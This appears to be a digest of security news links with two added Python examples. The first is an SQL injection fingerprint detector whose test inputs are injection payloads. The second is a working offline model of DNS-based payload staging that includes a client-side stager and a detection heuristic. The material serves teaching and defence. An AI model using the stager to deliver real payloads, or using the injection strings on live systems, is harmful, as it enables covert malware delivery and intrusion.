good post >> High School Student to InfoSec Pro: An Old College Try https://cradersecurity.com/articles/high-school-to-infosec-pro-part-1/
Crader Security
High School Student to InfoSec Pro: An Old College Try
How to tell if a career in Information Security is right for you. A multi-part series detailing how to land your first position in the security field.
Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits https://securityaffairs.co/wordpress/119845/cyber-crime/hacker-zero-day.html
Security Affairs
Hacker deposited $1M in a popular cybercrime marketplace to buy zero-day exploits
A threat actor has deposited 26.99 Bitcoins on one of the cybercrime forums; he aims to purchase zero-day exploits from other forum members.
LibInjection – Detect SQL Injection (SQLi) and Cross-Site Scripting (XSS) https://www.darknet.org.uk/2021/05/libinjection-detect-sql-injection-sqli-and-cross-site-scripting-xss/
Darknet - Hacking Tools, Hacker News & Cyber Security
LibInjection - Detect SQL Injection (SQLi) and XSS
LibInjection is a C library to detect SQL Injection (SQLi) and Cross-Site Scripting (XSS) through lexical analysis of real-world attacks.
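To make the "lexical analysis" idea concrete, here is an added example written for this digest. It is not libinjection's code: it tokenizes an input, reduces it to a short fingerprint of token classes, and checks the input in the three quoting contexts it could land in (unquoted, inside a single-quoted string, inside a double-quoted string). The token classes, keyword lists and the SQLI_FINGERPRINTS set are constructed assumptions for the illustration, not libinjection's fingerprint database.

```python
import re

# Added example in the spirit of libinjection's approach: tokenize, fingerprint,
# compare against known-bad fingerprints. NOT libinjection's lexer or data; the
# classes, keyword lists and SQLI_FINGERPRINTS below are constructed for this page.

LOGICAL = {"OR", "AND", "XOR"}                                  # class '&'
KEYWORDS = {"SELECT", "UNION", "INSERT", "UPDATE", "DELETE", "DROP", "TABLE",
            "FROM", "WHERE", "SLEEP", "BENCHMARK", "WAITFOR"}   # class 'k'

TOKEN_RE = re.compile(
    r"(?P<s>'(?:[^'\\]|\\.)*'?|\"(?:[^\"\\]|\\.)*\"?)"   # string literal, possibly unterminated
    r"|(?P<c>--[^\n]*|#[^\n]*|/\*.*?(?:\*/|$))"          # SQL comment
    r"|(?P<d>\d+(?:\.\d+)?)"                             # numeric literal
    r"|(?P<n>[A-Za-z_][A-Za-z0-9_]*)"                    # bareword: keyword, logical word or name
    r"|(?P<o>=|<>|!=|<=|>=|<|>|\|\||&&|[-+*/%])"           # operator
    r"|(?P<p>[();,])",                                   # punctuation, kept as itself
    re.DOTALL,
)

# Constructed set of fingerprints (first five token classes) produced by attack payloads.
SQLI_FINGERPRINTS = {"s&sos", "1&1o1", "sc", "1;kkn", "1kkn,"}

# The input is evaluated as if it landed unquoted, inside '...' and inside "...":
# a payload such as ' OR '1'='1 only shows its real shape once the quote it closes
# is accounted for, which is why a quote-less view of the same text looks harmless.
CONTEXTS = ("", "'", '"')


def tokenize(sql):
    """Return the fingerprint class of each token, in order."""
    classes = []
    pos = 0
    while pos < len(sql):
        if sql[pos].isspace():
            pos += 1
            continue
        m = TOKEN_RE.match(sql, pos)
        if m is None:
            classes.append("?")          # byte the lexer has no class for
            pos += 1
            continue
        kind, text = m.lastgroup, m.group()
        if kind == "s":
            classes.append("s")
        elif kind == "c":
            classes.append("c")
        elif kind == "d":
            classes.append("1")
        elif kind == "n":
            word = text.upper()
            classes.append("&" if word in LOGICAL else "k" if word in KEYWORDS else "n")
        elif kind == "o":
            classes.append("o")
        else:
            classes.append(text)         # ( ) ; , stand for themselves
        pos = m.end()
    return classes


def fingerprint(sql, max_tokens=5):
    """Fingerprint = classes of the first max_tokens tokens, joined."""
    return "".join(tokenize(sql)[:max_tokens])


def is_sqli(user_input):
    """True if the input fingerprints as an attack in any quoting context."""
    return any(fingerprint(prefix + user_input) in SQLI_FINGERPRINTS
               for prefix in CONTEXTS)


if __name__ == "__main__":
    for sample in ("' OR '1'='1", "admin'--", "1 UNION SELECT null,null", "O'Brien"):
        print(f"{sample!r:30} {[fingerprint(p + sample) for p in CONTEXTS]} -> {is_sqli(sample)}")
```

Note how `O'Brien` survives: it fingerprints as `ns`, `sn` and `s`, none of which is an attack shape, which is the property that lets a fingerprint approach avoid the false positives a naive "contains a quote" filter produces.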
Tracking Cobalt Strike: A Trend Micro Vision One Investigation https://www.trendmicro.com/en_us/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html
Trend Micro
Tracking Cobalt Strike: A Trend Micro Vision One Investigation
Sneaky Malware Reconfigures Hive OS Wallet for Profit https://securehoney.net/blog/sneaky-malware-reconfigures-hive-os-wallet-for-profit.html
Secure Honey
Sneaky Malware Reconfigures Hive OS Wallet for Profit | Secure Honey
I recently observed some malware (uploaded to my honeypot) that targets Hive OS's wallet configuration -- to redirect mined coins to the attacker.
Conti Unpacked | Understanding Ransomware Development As a Response to Detection https://labs.sentinelone.com/conti-unpacked-understanding-ransomware-development-as-a-response-to-detection/
SentinelOne
Conti Unpacked | Understanding Ransomware Development As a Response to Detection - SentinelLabs
Conti's rapid encryption speed is matched only by its rapid evolution. SentinelLabs' deep dive explores its development in unprecedented detail.
PRINTNIGHTMARE NETWORK ANALYSIS https://labs.jumpsec.com/printnightmare-network-analysis/
JUMPSEC Labs
PRINTNIGHTMARE NETWORK ANALYSIS
DNSStager: hide and transfer your payload using DNS https://securityonline.info/dnsstager-hide-and-transfer-your-payload-using-dns/
Cybersecurity News
DNSStager v1.0 releases: hide and transfer your payload using DNS
DNSStager will create a malicious DNS server that handles DNS requests to your domain and returns your payload as the response to specific record requests.
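The mechanism in that sentence, as an added example written for this digest rather than DNSStager's own code: the payload is cut into 16-byte pieces, each published as the AAAA record of a numbered label under an attacker-controlled zone, and a client reassembles it by resolving the labels in order. The zone layout (numbered labels plus a `meta` TXT record carrying chunk count, true length and SHA-256), the domain name and the sample payload are assumptions; the "server" is a dictionary standing in for the authoritative name server so the whole thing runs offline. A small resolver-log heuristic is included to show the footprint the scheme leaves for defenders.

```python
import hashlib
import ipaddress

# Added example: a minimal model of DNS payload staging. Not DNSStager's code; the
# zone layout, DOMAIN and SAMPLE_PAYLOAD are assumptions made for this illustration.

DOMAIN = "stage.example.com"            # assumed attacker-controlled zone
CHUNK = 16                              # one IPv6 address carries 16 raw bytes

# Constructed sample payload (not real shellcode): 200 bytes -> 13 AAAA records.
SAMPLE_PAYLOAD = bytes(range(200))


def chunk_payload(payload, size=CHUNK):
    """Split payload into size-byte pieces, zero-padding the last one."""
    return [payload[i:i + size].ljust(size, b"\x00")
            for i in range(0, len(payload), size)]


def build_zone(payload, domain=DOMAIN):
    """Server side: encode chunk i as the AAAA record of i.<domain>, and publish
    chunk count, true length and SHA-256 in meta.<domain> (TXT)."""
    chunks = chunk_payload(payload)
    zone = {f"{i}.{domain}": ("AAAA", str(ipaddress.IPv6Address(bytes(c))))
            for i, c in enumerate(chunks)}
    zone[f"meta.{domain}"] = (
        "TXT", f"{len(chunks)} {len(payload)} {hashlib.sha256(payload).hexdigest()}")
    return zone


def resolve(zone, qname, qtype):
    """Stand-in for a DNS query; returns record data, or None for NXDOMAIN/NODATA."""
    rec = zone.get(qname)
    return rec[1] if rec and rec[0] == qtype else None


def stager_fetch(zone, domain=DOMAIN):
    """Client side: read the TXT metadata, pull the AAAA records in order,
    strip the padding and verify the digest before returning the payload."""
    meta = resolve(zone, f"meta.{domain}", "TXT")
    if meta is None:
        raise LookupError("metadata record missing")
    count, length, digest = meta.split()
    buf = bytearray()
    for i in range(int(count)):
        addr = resolve(zone, f"{i}.{domain}", "AAAA")
        if addr is None:
            raise LookupError(f"chunk {i} missing")
        buf += ipaddress.IPv6Address(addr).packed
    payload = bytes(buf[:int(length)])
    if hashlib.sha256(payload).hexdigest() != digest:
        raise ValueError("payload digest mismatch")
    return payload


def suspicious_domains(queries, threshold=8):
    """Defender side: flag parent domains that receive many AAAA lookups for
    purely numeric leftmost labels, the trace this scheme leaves in resolver
    logs. `queries` is an iterable of (qname, qtype) pairs."""
    counts = {}
    for qname, qtype in queries:
        label, _, parent = qname.partition(".")
        if qtype == "AAAA" and label.isdigit():
            counts[parent] = counts.get(parent, 0) + 1
    return {d for d, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    zone = build_zone(SAMPLE_PAYLOAD)
    assert stager_fetch(zone) == SAMPLE_PAYLOAD
    log = [(name, rtype) for name, (rtype, _) in zone.items()]
    print(f"{len(zone)} records published; flagged: {suspicious_domains(log)}")
```

The digest check matters on the client side: resolvers cache and may answer out of order or serve stale records, so a stager that silently concatenates whatever comes back will execute corrupted bytes. On the defending side, the numeric-label heuristic is deliberately crude; a real detection would also look at query volume per source host and at AAAA answers that never get used for a connection.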
Microsoft's Emergency Patch Fails to Fully Fix PrintNightmare RCE Vulnerability https://thehackernews.com/2021/07/microsofts-emergency-patch-fails-to.html
Playing with PrintNightmare https://0xdf.gitlab.io/2021/07/08/playing-with-printnightmare.html
0xdf hacks stuff
Playing with PrintNightmare
CVE-2021-34527, or PrintNightmare, is a vulnerability in the Windows Print Spooler that allows a low-privileged user to escalate to administrator on a local box or on a remote server. This is especially bad because it is not uncommon for Domain Controllers…
Page Tables, VAD and PEB https://resources.infosecinstitute.com/topic/finding-enumerating-processes-within-memory-part-2/
Infosec Resources
Page tables, VAD and PEB | Infosec Resources
In this part of the series, we will understand how the process can be enumerated within memory. Just as a refresher, in part 1 of this series we had a look
New tool automatically finds buffer overflow vulnerabilities (for RUST) https://cylab.cmu.edu/news/2021/07/09-SyRust.html
www.cylab.cmu.edu
New tool automatically finds buffer overflow vulnerabilities
A team of CyLab researchers has designed a new tool that automatically checks for memory bugs, the types of bugs that can lead to buffer overflow exploits, a commonly deployed cyberattack.
Exploit mitigations: keeping up with evolving and complex software/hardware https://research.nccgroup.com/2021/06/28/exploit-mitigations-keeping-up-with-evolving-and-complex-software-hardware/
UDP Technology IP Camera vulnerabilities https://www.randorisec.fr/udp-technology-ip-camera-vulnerabilities/
Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580) https://medium.com/tenable-techblog/examining-crypto-and-bypassing-authentication-in-schneider-electric-plcs-m340-m580-f37cf9f3ff34
Medium
Examining Crypto and Bypassing Authentication in Schneider Electric PLCs (M340/M580)
It looks like authentication, but is it really?
You ain’t got no problem, Jules. I’m on the Multifactor. https://curtbraz.medium.com/you-aint-got-no-problem-jules-i-m-on-the-multifactor-e05d5e2a6ade
Medium
You ain’t got no problem, Jules. I’m on the Multifactor.
Practical Bypasses for MFA with Poor Implementations
Remote code execution in cdnjs of Cloudflare https://blog.ryotak.me/post/cdnjs-remote-code-execution-en/
blog.ryotak.net
Remote code execution in cdnjs of Cloudflare
Preface
(A Japanese version has also been published.)
Cloudflare, which runs cdnjs, is running a “Vulnerability Disclosure Program” on HackerOne, which allows hackers to perform vulnerability assessments.
This article describes vulnerabilities reported through this program and published…
FickerStealer: A New Rust Player in the Market https://www.cyberark.com/resources/threat-research-blog/fickerstealer-a-new-rust-player-in-the-market
Cyberark
FickerStealer: A New Rust Player in the Market
This blog introduces a new information stealer, written in Rust and interestingly named FickerStealer. In this blog post, we provide an in-depth analysis of this new threat and its obfuscation...
Ecuador's state-run CNT under attack via RansomEXX Ransomware https://www.secureblink.com/cyber-security-news/ecuador's-state-run-cnt-under-attack-via-ransomexx-ransomware
Secure Blink
Ecuador's state-run CNT under attack via RansomEXX Ransomware | Secure Blink
CNT hit by RansomEXX ransomware. Customer and corporate data compromised and hosted on the breached website. 190 GB of data supposedly stolen...